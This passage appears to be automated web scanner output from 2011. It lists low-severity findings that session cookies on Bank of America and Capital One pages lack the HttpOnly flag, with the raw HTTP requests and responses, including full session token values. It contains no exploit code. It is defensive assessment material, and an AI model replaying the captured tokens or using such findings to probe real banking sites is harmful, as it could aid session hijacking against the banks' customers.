Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       

11.83. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/overview.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:36:54 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000rkA76miCyoAH_YXJjPhdBRX:157dm9mod; Path=/
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48227


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

11.84. https://www.bankofamerica.com/homepage/stateSelect.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/stateSelect.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/stateSelect.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:37:01 GMT
Server: IBM_HTTP_Server
Location: https://www.bankofamerica.com/content/documents/homepage/fail-over-state.htm
Content-Length: 0
Set-Cookie: JSESSIONID=0000KfKQ5uJUidkgqvdCEWeKhAN:157dm9kih; Path=/
Set-Cookie: state=""; Expires=Mon, 01 Aug 2011 22:36:32 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Via: On-Demand Router/1.0
Connection: close
Content-Type: text/plain
Content-Language: en-US


11.85. https://www.bankofamerica.com/hub/index.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /hub/index.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hub/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:54 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/
Content-language: en-US
Set-cookie: JSESSIONID=00008fBXnMpsDuQjSc8kH5YogBG:12qb4k2ev; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


11.86. https://www.bankofamerica.com/myexpression_banking/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /myexpression_banking/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myexpression_banking/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:37:19 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:37:18 GMT
Content-language: en-US
Set-cookie: JSESSIONID=0000qBCC58S04lOiUm6Gm3P4sLQ:12rfueg3b; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description"
...[SNIP]...

11.87. https://www.bankofamerica.com/planning/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /planning/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /planning/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:36:25 GMT
Content-length: 0
Content-type: text/html
Location: https://www5.bankofamerica.com/planning/investments.action
Content-language: en-US
Set-cookie: JSESSIONID=0000MZoA15Z0qVQ4mcJR1wynojo:12qtmh33l; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


11.88. https://www.bankofamerica.com/planning/investments.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /planning/investments.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /planning/investments.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:32 GMT
Content-type: text/html
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache, post-check=0, pre-check=0
Content-language: en-US
Set-cookie: JSESSIONID=0000-_A2xQfu_W2uW6lF2fly4Fp:12qb4k2ev; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

11.89. https://www.bankofamerica.com/privacy/Control.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000mMBXhgo6t8S8rSEKqaClP3F:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:06 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...

11.90. https://www.bankofamerica.com/privacy/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:05 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000lQoVpN6o_Syjb5ohyReSXTa:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:04 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...

11.91. https://www.bankofamerica.com/retirementcenter/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /retirementcenter/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retirementcenter/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:04 GMT
Content-length: 6708
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:05:04 GMT
Content-language: en-US
Set-cookie: JSESSIONID=00000dst3On8WtECYEVTJX5Czjw:12qb4kb6q; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


       <title>Bank of America | Please Select Your State</title>
       <link rel="stylesheet" href="/www/global/mvc_objects/stylesheet/mvc_content_style.css" type="text/css">
       <link rel="stylesheet" href
...[SNIP]...

11.92. https://www.bankofamerica.com/search/Search.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /search/Search.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/Search.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:13 GMT
Content-length: 0
Location: https://www6.bankofamerica.com/search/Search.do
Content-language: en-US
Set-cookie: JSESSIONID=0000d7-ksy874kdblG0_pEKtKn2:13ihk3qeh; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


11.93. https://www.bankofamerica.com/sitemap/index.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /sitemap/index.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:13 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/sitemap/index.jsp
Content-language: en-US
Set-cookie: JSESSIONID=0000AHYKHX5RDNXbJ74F_kN_fGy:12qb4k2ev; Path=/
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:13 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


11.94. https://www.bankofamerica.com/smallbusiness/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:29 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00001dmfVt102GWARUceA1dBtn0:12qb4k7c1; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:28 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...

11.95. http://www.capitalone.com/about/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capitalone.com
Path:   /about/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=1p8qNJWYfWB5ZkwnxDLZnjSHsp1RWFYccXhcpFpZ4PHTpW00Lg88!1025162061; path=/
Set-Cookie: Corporate=6d2bccf6cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCo8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS06NMzQwgKj3zENTDAA%3D; domain=.capitalone.com; expires=Saturday, 30-Jan-2021 22:12:40 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 55757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Explore the history and culture of one of America's
...[SNIP]...

11.96. http://www.capitalone.com/smallbusiness/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capitalone.com
Path:   /smallbusiness/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 59681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse our small business banking products includin
...[SNIP]...

11.97. http://www.capitalone.com/smallbusiness/business-money-market/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capitalone.com
Path:   /smallbusiness/business-money-market/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/business-money-market/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:00 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=cgfmNJWQcJvjTlBLWy8QTQF18zjDLG9y6zLG2jyvTXxr2jFQ7lYV!-1710325866; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDU0MDhDdmtVV0dvb0VzajAvTTlLUXNyc1pnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 60850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B
...[SNIP]...

11.98. http://www.capitalone.com/smallbusiness/cards/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/cards/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
